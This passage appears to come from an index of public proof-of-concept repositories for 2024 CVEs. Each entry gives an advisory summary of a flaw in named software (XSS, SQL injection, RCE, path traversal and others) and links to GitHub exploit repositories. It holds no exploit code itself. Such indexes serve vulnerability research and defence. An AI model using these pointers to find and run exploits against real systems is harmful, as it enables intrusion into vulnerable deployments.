[FakesiteSecurity/CVE-2024-38856_Scen](https://github.com/FakesiteSecurity/CVE-2024-38856_Scen) + +### CVE-2024-38998 (2024-07-01) + +jrburke requirejs v2.3.6 was discovered to contain a prototype pollution via the function config. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties. + + +- [z3ldr1/PP_CVE-2024-38998](https://github.com/z3ldr1/PP_CVE-2024-38998) + +### CVE-2024-39031 (2024-07-09) + +In Silverpeas Core <= 6.3.5, in Mes Agendas, a user can create new events and add them to their calendar. Additionally, users can invite others from the same domain, including administrators, to these events. A standard user can inject an XSS payload into the "Titre" and "Description" fields when creating an event and then add the administrator or any user to the event. When the invited user (victim) views their own profile, the payload will be executed on their side, even if they do not click on the event. + + +- [toneemarqus/CVE-2024-39031](https://github.com/toneemarqus/CVE-2024-39031) + +### CVE-2024-39069 (2024-07-09) + +An issue in ifood Order Manager v3.35.5 'Gestor de Peddios.exe' allows attackers to execute arbitrary code via a DLL hijacking attack. + + +- [AungSoePaing/CVE-2024-39069](https://github.com/AungSoePaing/CVE-2024-39069) + +### CVE-2024-39081 (2024-09-18) + +An issue in SMART TYRE CAR & BIKE v4.2.0 allows attackers to perform a man-in-the-middle attack via Bluetooth communications. + + +- [Amirasaiyad/BLE-TPMS](https://github.com/Amirasaiyad/BLE-TPMS) + +### CVE-2024-39090 (2024-07-18) + +The PHPGurukul Online Shopping Portal Project version 2.0 contains a vulnerability that allows Cross-Site Request Forgery (CSRF) to lead to Stored Cross-Site Scripting (XSS). An attacker can exploit this vulnerability to execute arbitrary JavaScript code in the context of a user's session, potentially leading to account takeover. + + +- [ghostwirez/CVE-2024-39090-PoC](https://github.com/ghostwirez/CVE-2024-39090-PoC) + +### CVE-2024-39203 (2024-07-08) + +A cross-site scripting (XSS) vulnerability in the Backend Theme Management module of Z-BlogPHP v1.7.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + + +- [5r1an/CVE-2024-39203](https://github.com/5r1an/CVE-2024-39203) + +### CVE-2024-39205 (2024-10-28) + +An issue in pyload-ng v0.5.0b3.dev85 running under python3.11 or below allows attackers to execute arbitrary code via a crafted HTTP request. + + +- [Marven11/CVE-2024-39205-Pyload-RCE](https://github.com/Marven11/CVE-2024-39205-Pyload-RCE) + +### CVE-2024-39210 (2024-07-05) + +Best House Rental Management System v1.0 was discovered to contain an arbitrary file read vulnerability via the Page parameter at index.php. This vulnerability allows attackers to read arbitrary PHP files and access other sensitive information within the application. + + +- [KRookieSec/CVE-2024-39210](https://github.com/KRookieSec/CVE-2024-39210) + +### CVE-2024-39211 (2024-07-04) + +Kaiten 57.128.8 allows remote attackers to enumerate user accounts via a crafted POST request, because a login response contains a user_email field only if the user account exists. + + +- [artemy-ccrsky/CVE-2024-39211](https://github.com/artemy-ccrsky/CVE-2024-39211) + +### CVE-2024-39248 (2024-07-03) + +A cross-site scripting (XSS) vulnerability in SimpCMS v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field at /admin.php. + + +- [jasonthename/CVE-2024-39248](https://github.com/jasonthename/CVE-2024-39248) + +### CVE-2024-39250 (2024-07-22) + +EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface. + + +- [efrann/CVE-2024-39250](https://github.com/efrann/CVE-2024-39250) + +### CVE-2024-39304 (2024-07-26) + +ChurchCRM is an open-source church management system. Versions of the application prior to 5.9.2 are vulnerable to an authenticated SQL injection due to an improper sanitization of user input. Authentication is required, but no elevated privileges are necessary. This allows attackers to inject SQL statements directly into the database query due to inadequate sanitization of the EID parameter in in a GET request to `/GetText.php`. Version 5.9.2 patches the issue. + + +- [apena-ba/CVE-2024-39304](https://github.com/apena-ba/CVE-2024-39304) + +### CVE-2024-39306 +- [apena-ba/CVE-2024-39306](https://github.com/apena-ba/CVE-2024-39306) + +### CVE-2024-39614 (2024-07-10) + +An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_variant() was subject to a potential denial-of-service attack when used with very long strings containing specific characters. + + +- [Abdurahmon3236/-CVE-2024-39614](https://github.com/Abdurahmon3236/-CVE-2024-39614) + +### CVE-2024-39689 (2024-07-05) + +Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi starting in 2021.05.30 and prior to 2024.07.4 recognized root certificates from `GLOBALTRUST`. Certifi 2024.07.04 removes root certificates from `GLOBALTRUST` from the root store. These are in the process of being removed from Mozilla's trust store. `GLOBALTRUST`'s root certificates are being removed pursuant to an investigation which identified "long-running and unresolved compliance issues." + + +- [roy-aladin/InfraTest](https://github.com/roy-aladin/InfraTest) + +### CVE-2024-39700 (2024-07-16) + +JupyterLab extension template is a `copier` template for JupyterLab extensions. Repositories created using this template with `test` option include `update-integration-tests.yml` workflow which has an RCE vulnerability. Extension authors hosting their code on GitHub are urged to upgrade the template to the latest version. Users who made changes to `update-integration-tests.yml`, accept overwriting of this file and re-apply your changes later. Users may wish to temporarily disable GitHub Actions while working on the upgrade. We recommend rebasing all open pull requests from untrusted users as actions may run using the version from the `main` branch at the time when the pull request was created. Users who are upgrading from template version prior to 4.3.0 may wish to leave out proposed changes to the release workflow for now as it requires additional configuration. + + +- [LOURC0D3/CVE-2024-39700-PoC](https://github.com/LOURC0D3/CVE-2024-39700-PoC) + +### CVE-2024-39844 (2024-07-03) + +In ZNC before 1.9.1, remote code execution can occur in modtcl via a KICK. + + +- [ph1ns/CVE-2024-39844](https://github.com/ph1ns/CVE-2024-39844) + +### CVE-2024-39908 (2024-07-16) + + REXML is an XML toolkit for Ruby. The REXML gem before 3.3.1 has some DoS vulnerabilities when it parses an XML that has many specific characters such as `<`, `0` and `%>`. If you need to parse untrusted XMLs, you many be impacted to these vulnerabilities. The REXML gem 3.3.2 or later include the patches to fix these vulnerabilities. Users are advised to upgrade. Users unable to upgrade should avoid parsing untrusted XML strings. + + +- [SpiralBL0CK/CVE-2024-39908](https://github.com/SpiralBL0CK/CVE-2024-39908) + +### CVE-2024-39914 (2024-07-12) + +FOG is a cloning/imaging/rescue suite/inventory management system. Prior to 1.5.10.34, packages/web/lib/fog/reportmaker.class.php in FOG was affected by a command injection via the filename parameter to /fog/management/export.php. This vulnerability is fixed in 1.5.10.34. + + +- [9874621368/FOG-Project](https://github.com/9874621368/FOG-Project) + +### CVE-2024-39929 (2024-07-04) + +Exim through 4.97.1 misparses a multiline RFC 2231 header filename, and thus remote attackers can bypass a $mime_filename extension-blocking protection mechanism, and potentially deliver executable attachments to the mailboxes of end users. + + +- [rxerium/CVE-2024-39929](https://github.com/rxerium/CVE-2024-39929) +- [michael-david-fry/CVE-2024-39929](https://github.com/michael-david-fry/CVE-2024-39929) + +### CVE-2024-39943 (2024-07-04) + +rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js). + + +- [truonghuuphuc/CVE-2024-39943-Poc](https://github.com/truonghuuphuc/CVE-2024-39943-Poc) + +### CVE-2024-40080 +- [perras/CVE-2024-40080](https://github.com/perras/CVE-2024-40080) + +### CVE-2024-40110 (2024-07-12) + +Sourcecodester Poultry Farm Management System v1.0 contains an Unauthenticated Remote Code Execution (RCE) vulnerability via the productimage parameter at /farm/product.php. + + +- [Abdurahmon3236/CVE-2024-40110](https://github.com/Abdurahmon3236/CVE-2024-40110) + +### CVE-2024-40119 (2024-07-17) + +Nepstech Wifi Router xpon (terminal) model NTPL-Xpon1GFEVN v.1.0 Firmware V2.0.1 contains a Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover. + + +- [sudo-subho/nepstech-xpon-router-CVE-2024-40119](https://github.com/sudo-subho/nepstech-xpon-router-CVE-2024-40119) + +### CVE-2024-40318 (2024-07-25) + +An arbitrary file upload vulnerability in Webkul Qloapps v1.6.0.0 allows attackers to execute arbitrary code via uploading a crafted file. + + +- [3v1lC0d3/RCE-QloApps-CVE-2024-40318](https://github.com/3v1lC0d3/RCE-QloApps-CVE-2024-40318) + +### CVE-2024-40324 (2024-07-25) + +A CRLF injection vulnerability in E-Staff v5.1 allows attackers to insert Carriage Return (CR) and Line Feed (LF) characters into input fields, leading to HTTP response splitting and header manipulation. + + +- [aleksey-vi/CVE-2024-40324](https://github.com/aleksey-vi/CVE-2024-40324) + +### CVE-2024-40348 (2024-07-20) + +An issue in the component /api/swaggerui/static of Bazaar v1.4.3 allows unauthenticated attackers to execute a directory traversal. + + +- [bigb0x/CVE-2024-40348](https://github.com/bigb0x/CVE-2024-40348) +- [NingXin2002/Bazaar_poc](https://github.com/NingXin2002/Bazaar_poc) + +### CVE-2024-40422 (2024-07-24) + +The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system. + + +- [alpernae/CVE-2024-40422](https://github.com/alpernae/CVE-2024-40422) +- [j3r1ch0123/CVE-2024-40422](https://github.com/j3r1ch0123/CVE-2024-40422) + +### CVE-2024-40431 (2024-10-23) + +A lack of input validation in Realtek SD card reader driver before 10.0.26100.21374 through the implementation of the IOCTL_SCSI_PASS_THROUGH control of the SD card reader driver allows an attacker to write to predictable kernel memory locations, even as a low-privileged user. + + +- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN) + +### CVE-2024-40443 (2024-11-13) + +SQL Injection vulnerability in Simple Laboratory Management System using PHP and MySQL v.1.0 allows a remote attacker to cause a denial of service via the delete_users function in the Useres.php + + +- [Yuma-Tsushima07/CVE-2024-40443](https://github.com/Yuma-Tsushima07/CVE-2024-40443) + +### CVE-2024-40457 (2024-09-12) + +No-IP Dynamic Update Client (DUC) v3.x uses cleartext credentials that may occur on a command line or in a file. NOTE: the vendor's position is that cleartext in /etc/default/noip-duc is recommended and is the intentional behavior. + + +- [jeppojeps/CVE-2024-40457-PoC](https://github.com/jeppojeps/CVE-2024-40457-PoC) + +### CVE-2024-40492 (2024-07-17) + +Cross Site Scripting vulnerability in Heartbeat Chat v.15.2.1 allows a remote attacker to execute arbitrary code via the setname function. + + +- [minendie/POC_CVE-2024-40492](https://github.com/minendie/POC_CVE-2024-40492) + +### CVE-2024-40498 (2024-08-05) + +SQL Injection vulnerability in PuneethReddyHC Online Shopping sysstem advanced v.1.0 allows an attacker to execute arbitrary code via the register.php + + +- [Dirac231/CVE-2024-40498](https://github.com/Dirac231/CVE-2024-40498) + +### CVE-2024-40500 (2024-08-12) + +Cross Site Scripting vulnerability in Martin Kucej i-librarian v.5.11.0 and before allows a local attacker to execute arbitrary code via the search function in the import component. + + +- [nitipoom-jar/CVE-2024-40500](https://github.com/nitipoom-jar/CVE-2024-40500) + +### CVE-2024-40506 (2024-09-26) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMHospitality.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40506](https://github.com/Jansen-C-Moreira/CVE-2024-40506) + +### CVE-2024-40507 (2024-09-26) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMPersonnel.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40507](https://github.com/Jansen-C-Moreira/CVE-2024-40507) + +### CVE-2024-40508 (2024-09-26) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMConference.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40508](https://github.com/Jansen-C-Moreira/CVE-2024-40508) + +### CVE-2024-40509 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMFinDev.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40509](https://github.com/Jansen-C-Moreira/CVE-2024-40509) + +### CVE-2024-40510 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMCommon.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40510](https://github.com/Jansen-C-Moreira/CVE-2024-40510) + +### CVE-2024-40511 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMServerAdmin.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40511](https://github.com/Jansen-C-Moreira/CVE-2024-40511) + +### CVE-2024-40512 (2024-09-27) + +Cross Site Scripting vulnerability in openPetra v.2023.02 allows a remote attacker to obtain sensitive information via the serverMReporting.asmx function. + + +- [Jansen-C-Moreira/CVE-2024-40512](https://github.com/Jansen-C-Moreira/CVE-2024-40512) + +### CVE-2024-40617 (2024-07-17) + +Path traversal vulnerability exists in FUJITSU Network Edgiot GW1500 (M2M-GW for FENICS). If a remote authenticated attacker with User Class privilege sends a specially crafted request to the affected product, access restricted files containing sensitive information may be accessed. As a result, Administrator Class privileges of the product may be hijacked. + + +- [KyssK00L/CVE-2024-40617](https://github.com/KyssK00L/CVE-2024-40617) + +### CVE-2024-40658 (2024-09-11) + +In getConfig of SoftVideoDecoderOMXComponent.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-40658) + +### CVE-2024-40662 (2024-09-11) + +In scheme of Uri.java, there is a possible way to craft a malformed Uri object due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [Aakashmom/net_G2.5_CVE-2024-40662](https://github.com/Aakashmom/net_G2.5_CVE-2024-40662) + +### CVE-2024-40673 +- [Aakashmom/G3_libcore_native_CVE-2024-40673](https://github.com/Aakashmom/G3_libcore_native_CVE-2024-40673) + +### CVE-2024-40675 +- [Aakashmom/intent_CVE-2024-40675](https://github.com/Aakashmom/intent_CVE-2024-40675) + +### CVE-2024-40676 +- [Aakashmom/frameworks_base_accounts_CVE-2024-40676](https://github.com/Aakashmom/frameworks_base_accounts_CVE-2024-40676) +- [Aakashmom/accounts_CVE-2024-40676-](https://github.com/Aakashmom/accounts_CVE-2024-40676-) + +### CVE-2024-40711 (2024-09-07) + +A deserialization of untrusted data vulnerability with a malicious payload can allow an unauthenticated remote code execution (RCE). + + +- [watchtowrlabs/CVE-2024-40711](https://github.com/watchtowrlabs/CVE-2024-40711) +- [realstatus/CVE-2024-40711-Exp](https://github.com/realstatus/CVE-2024-40711-Exp) +- [XiaomingX/cve-2024-40711-poc](https://github.com/XiaomingX/cve-2024-40711-poc) + +### CVE-2024-40725 (2024-07-18) + +A partial fix for  CVE-2024-39884 in the core of Apache HTTP Server 2.4.61 ignores some use of the legacy content-type based configuration of handlers. "AddType" and similar configuration, under some circumstances where files are requested indirectly, result in source code disclosure of local content. For example, PHP scripts may be served instead of interpreted.\n\nUsers are recommended to upgrade to version 2.4.62, which fixes this issue.\n\n + + +- [TAM-K592/CVE-2024-40725-CVE-2024-40898](https://github.com/TAM-K592/CVE-2024-40725-CVE-2024-40898) +- [whiterose7777/CVE-2024-40725-CVE-2024-40898](https://github.com/whiterose7777/CVE-2024-40725-CVE-2024-40898) +- [soltanali0/CVE-2024-40725](https://github.com/soltanali0/CVE-2024-40725) + +### CVE-2024-40892 (2024-08-12) + +A weak credential vulnerability exists in Firewalla Box Software versions before 1.979. This vulnerability allows a physically close attacker to use the license UUID for authentication and provision SSH credentials over the Bluetooth Low-Energy (BTLE) interface. Once an attacker gains access to the LAN, they could log into the SSH interface using the provisioned credentials. The license UUID can be acquired through plain-text Bluetooth sniffing, reading the QR code on the bottom of the device, or brute-forcing the UUID (though this is less likely). + + +- [xen0bit/fwbt](https://github.com/xen0bit/fwbt) + +### CVE-2024-41107 (2024-07-19) + +The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account. In such environments, this can result in a complete compromise of the resources owned and/or accessible by a SAML enabled user-account.\n\nAffected users are recommended to disable the SAML authentication plugin by setting the "saml2.enabled" global setting to "false", or upgrade to version 4.18.2.2, 4.19.1.0 or later, which addresses this issue.\n\n + + +- [d0rb/CVE-2024-41107](https://github.com/d0rb/CVE-2024-41107) + +### CVE-2024-41110 (2024-07-24) + +Moby is an open-source project created by Docker for software containerization. A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low.\n\nUsing a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.\n\nA security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.\n\nDocker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.\n\ndocker-ce v27.1.1 containes patches to fix the vulnerability. Patches have also been merged into the master, 19.03, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches. If one is unable to upgrade immediately, avoid using AuthZ plugins and/or restrict access to the Docker API to trusted parties, following the principle of least privilege. + + +- [vvpoglazov/cve-2024-41110-checker](https://github.com/vvpoglazov/cve-2024-41110-checker) +- [PauloParoPP/CVE-2024-41110-SCAN](https://github.com/PauloParoPP/CVE-2024-41110-SCAN) + +### CVE-2024-41276 (2024-10-01) + +A vulnerability in Kaiten version 57.131.12 and earlier allows attackers to bypass the PIN code authentication mechanism. The application requires users to input a 6-digit PIN code sent to their email for authorization after entering their login credentials. However, the request limiting mechanism can be easily bypassed, enabling attackers to perform a brute force attack to guess the correct PIN and gain unauthorized access to the application. + + +- [artemy-ccrsky/CVE-2024-41276](https://github.com/artemy-ccrsky/CVE-2024-41276) + +### CVE-2024-41290 (2024-10-02) + +FlatPress CMS v1.3.1 1.3 was discovered to use insecure methods to store authentication data via the cookie's component. + + +- [paragbagul111/CVE-2024-41290](https://github.com/paragbagul111/CVE-2024-41290) + +### CVE-2024-41301 +- [patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting](https://github.com/patrickdeanramos/CVE-2024-41301-Bookea-tu-Mesa-is-vulnerable-to-Stored-Cross-Site-Scripting) + +### CVE-2024-41302 +- [patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection](https://github.com/patrickdeanramos/CVE-2024-41302-Bookea-tu-Mesa-is-vulnerable-to-SQL-Injection) + +### CVE-2024-41312 +- [Amal264882/CVE-2024-41312.](https://github.com/Amal264882/CVE-2024-41312.) + +### CVE-2024-41319 (2024-07-23) + +TOTOLINK A6000R V1.0.1-B20201211.2000 was discovered to contain a command injection vulnerability via the cmd parameter in the webcmd function. + + +- [NingXin2002/TOTOLINK_poc](https://github.com/NingXin2002/TOTOLINK_poc) + +### CVE-2024-41570 (2024-08-09) + +An Unauthenticated Server-Side Request Forgery (SSRF) in demon callback handling in Havoc 2 0.7 allows attackers to send arbitrary network traffic originating from the team server. + + +- [chebuya/Havoc-C2-SSRF-poc](https://github.com/chebuya/Havoc-C2-SSRF-poc) + +### CVE-2024-41628 (2024-07-26) + +Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API. + + +- [Redshift-CyberSecurity/CVE-2024-41628](https://github.com/Redshift-CyberSecurity/CVE-2024-41628) + +### CVE-2024-41640 (2024-07-29) + +Cross Site Scripting (XSS) vulnerability in AML Surety Eco up to 3.5 allows an attacker to run arbitrary code via crafted GET request using the id parameter. + + +- [alemusix/CVE-2024-41640](https://github.com/alemusix/CVE-2024-41640) + +### CVE-2024-41651 (2024-08-12) + +An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality. NOTE: this is disputed by multiple parties, who report that exploitation requires that an attacker be able to hijack network requests made by an admin user (who, by design, is allowed to change the code that is running on the server). + + +- [Fckroun/CVE-2024-41651](https://github.com/Fckroun/CVE-2024-41651) + +### CVE-2024-41662 (2024-07-24) + +VNote is a note-taking platform. A Cross-Site Scripting (XSS) vulnerability has been identified in the Markdown rendering functionality of versions 3.18.1 and prior of the VNote note-taking application. This vulnerability allows the injection and execution of arbitrary JavaScript code through which remote code execution can be achieved. A patch for this issue is available at commit f1af78573a0ef51d6ef6a0bc4080cddc8f30a545. Other mitigation strategies include implementing rigorous input sanitization for all Markdown content and utilizing a secure Markdown parser that appropriately escapes or strips potentially dangerous content. + + +- [sh3bu/CVE-2024-41662](https://github.com/sh3bu/CVE-2024-41662) + +### CVE-2024-41713 (2024-10-21) + +A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations. + + +- [watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713](https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713) +- [zxj-hub/CVE-2024-41713POC](https://github.com/zxj-hub/CVE-2024-41713POC) +- [Sanandd/cve-2024-CVE-2024-41713](https://github.com/Sanandd/cve-2024-CVE-2024-41713) + +### CVE-2024-41958 (2024-08-05) + +mailcow: dockerized is an open source groupware/email suite based on docker. A vulnerability has been discovered in the two-factor authentication (2FA) mechanism. This flaw allows an authenticated attacker to bypass the 2FA protection, enabling unauthorized access to other accounts that are otherwise secured with 2FA. To exploit this vulnerability, the attacker must first have access to an account within the system and possess the credentials of the target account that has 2FA enabled. By leveraging these credentials, the attacker can circumvent the 2FA process and gain access to the protected account. This issue has been addressed in the `2024-07` release. All users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [OrangeJuiceHU/CVE-2024-41958-PoC](https://github.com/OrangeJuiceHU/CVE-2024-41958-PoC) + +### CVE-2024-41992 (2024-11-11) + +Wi-Fi Alliance wfa_dut (in Wi-Fi Test Suite) through 9.0.0 allows OS command injection via 802.11x frames because the system() library function is used. For example, on Arcadyan FMIMG51AX000J devices, this leads to wfaTGSendPing remote code execution as root via traffic to TCP port 8000 or 8080 on a LAN interface. On other devices, this may be exploitable over a WAN interface. + + +- [fj016/CVE-2024-41992-PoC](https://github.com/fj016/CVE-2024-41992-PoC) + +### CVE-2024-42327 (2024-11-27) + +A non-admin user account on the Zabbix frontend with the default User role, or with any other role that gives API access can exploit this vulnerability. An SQLi exists in the CUser class in the addRelatedObjects function, this function is being called from the CUser.get function which is available for every user who has API access. + + +- [aramosf/cve-2024-42327](https://github.com/aramosf/cve-2024-42327) +- [compr00t/CVE-2024-42327](https://github.com/compr00t/CVE-2024-42327) +- [depers-rus/CVE-2024-42327](https://github.com/depers-rus/CVE-2024-42327) +- [watchdog1337/CVE-2024-42327_Zabbix_SQLI](https://github.com/watchdog1337/CVE-2024-42327_Zabbix_SQLI) +- [itform-fr/Zabbix---CVE-2024-42327](https://github.com/itform-fr/Zabbix---CVE-2024-42327) +- [igorbf495/CVE-2024-42327](https://github.com/igorbf495/CVE-2024-42327) +- [BridgerAlderson/Zabbix-CVE-2024-42327-SQL-Injection-RCE](https://github.com/BridgerAlderson/Zabbix-CVE-2024-42327-SQL-Injection-RCE) + +### CVE-2024-42346 (2024-09-20) + +Galaxy is a free, open-source system for analyzing data, authoring workflows, training and education, publishing tools, managing infrastructure, and more. The editor visualization, /visualizations endpoint, can be used to store HTML tags and trigger javascript execution upon edit operation. All supported branches of Galaxy (and more back to release_20.05) were amended with the supplied patches. Users are advised to upgrade. There are no known workarounds for this vulnerability. + + +- [partywavesec/CVE-2024-42346](https://github.com/partywavesec/CVE-2024-42346) + +### CVE-2024-42448 (2024-12-11) + +From the VSPC management agent machine, under condition that the management agent is authorized on the server, it is possible to perform Remote Code Execution (RCE) on the VSPC server machine. + + +- [h3lye/CVE-2024-42448-RCE](https://github.com/h3lye/CVE-2024-42448-RCE) + +### CVE-2024-42461 (2024-08-02) + +In the Elliptic package 6.5.6 for Node.js, ECDSA signature malleability occurs because BER-encoded signatures are allowed. + + +- [fevar54/CVE-2024-42461](https://github.com/fevar54/CVE-2024-42461) + +### CVE-2024-42640 (2024-10-11) + +angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + + +- [rvizx/CVE-2024-42640](https://github.com/rvizx/CVE-2024-42640) +- [KTN1990/CVE-2024-42640](https://github.com/KTN1990/CVE-2024-42640) + +### CVE-2024-42642 (2024-09-04) + +Micron Crucial MX500 Series Solid State Drives M3CR046 is vulnerable to Buffer Overflow, which can be triggered by sending specially crafted ATA packets from the host to the drive controller. + + +- [VL4DR/CVE-2024-42642](https://github.com/VL4DR/CVE-2024-42642) + +### CVE-2024-42657 (2024-08-19) + +An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the lack of encryption during login process + + +- [sudo-subho/CVE-2024-42657](https://github.com/sudo-subho/CVE-2024-42657) + +### CVE-2024-42658 (2024-08-19) + +An issue in wishnet Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 allows a remote attacker to obtain sensitive information via the cookie's parameter + + +- [sudo-subho/CVE-2024-42658](https://github.com/sudo-subho/CVE-2024-42658) + +### CVE-2024-42758 (2024-08-16) + +A Cross-site Scripting (XSS) vulnerability exists in version v2024-01-05 of the indexmenu plugin when is used and enabled in Dokuwiki (Open Source Wiki Engine). A malicious attacker can input XSS payloads for example when creating or editing existing page, to trigger the XSS on Dokuwiki, which is then stored in .txt file (due to nature of how Dokuwiki is designed), which presents stored XSS. + + +- [1s1ldur/CVE-2024-42758](https://github.com/1s1ldur/CVE-2024-42758) + +### CVE-2024-42834 (2024-11-13) + +A stored cross-site scripting (XSS) vulnerability in the Create Customer API in Incognito Service Activation Center (SAC) UI v14.11 allows authenticated attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the lastName parameter. + + +- [CyberSec-Supra/CVE-2024-42834](https://github.com/CyberSec-Supra/CVE-2024-42834) + +### CVE-2024-42845 (2024-08-23) + +An eval Injection vulnerability in the component invesalius/reader/dicom.py of InVesalius 3.1.99991 through 3.1.99998 allows attackers to execute arbitrary code via loading a crafted DICOM file. + + +- [partywavesec/invesalius3_vulnerabilities](https://github.com/partywavesec/invesalius3_vulnerabilities) + +### CVE-2024-42849 (2024-08-16) + +An issue in Silverpeas v.6.4.2 and lower allows a remote attacker to cause a denial of service via the password change function. + + +- [njmbb8/CVE-2024-42849](https://github.com/njmbb8/CVE-2024-42849) + +### CVE-2024-42850 (2024-08-16) + +An issue in the password change function of Silverpeas v6.4.2 and lower allows for the bypassing of password complexity requirements. + + +- [njmbb8/CVE-2024-42850](https://github.com/njmbb8/CVE-2024-42850) + +### CVE-2024-42861 (2024-09-23) + +An issue in IEEE 802.1AS linuxptp v.4.2 and before allowing a remote attacker to cause a denial of service via a crafted Pdelay_Req message to the time synchronization function + + +- [qiupy123/CVE-2024-42861](https://github.com/qiupy123/CVE-2024-42861) + +### CVE-2024-42919 (2024-08-20) + +eScan Management Console 14.0.1400.2281 is vulnerable to Incorrect Access Control via acteScanAVReport. + + +- [jeyabalaji711/CVE-2024-42919](https://github.com/jeyabalaji711/CVE-2024-42919) + +### CVE-2024-42992 +- [thanhh23/CVE-2024-42992](https://github.com/thanhh23/CVE-2024-42992) + +### CVE-2024-43035 +- [ZeroPathAI/Fonoster-LFI-PoC](https://github.com/ZeroPathAI/Fonoster-LFI-PoC) + +### CVE-2024-43044 (2024-08-07) + +Jenkins 2.470 and earlier, LTS 2.452.3 and earlier allows agent processes to read arbitrary files from the Jenkins controller file system by using the `ClassLoaderProxy#fetchJar` method in the Remoting library. + + +- [HwMex0/CVE-2024-43044](https://github.com/HwMex0/CVE-2024-43044) +- [jenkinsci-cert/SECURITY-3430](https://github.com/jenkinsci-cert/SECURITY-3430) +- [v9d0g/CVE-2024-43044-POC](https://github.com/v9d0g/CVE-2024-43044-POC) +- [convisolabs/CVE-2024-43044-jenkins](https://github.com/convisolabs/CVE-2024-43044-jenkins) + +### CVE-2024-43160 (2024-08-13) + +Unrestricted Upload of File with Dangerous Type vulnerability in BerqWP allows Code Injection.This issue affects BerqWP: from n/a through 1.7.6. + + +- [KTN1990/CVE-2024-43160](https://github.com/KTN1990/CVE-2024-43160) + +### CVE-2024-43363 (2024-10-07) + +Cacti is an open source performance and fault management framework. An admin user can create a device with a malicious hostname containing php code and repeat the installation process (completing only step 5 of the installation process is enough, no need to complete the steps before or after it) to use a php file as the cacti log file. After having the malicious hostname end up in the logs (log poisoning), one can simply go to the log file url to execute commands to achieve RCE. This issue has been addressed in version 1.2.28 and all users 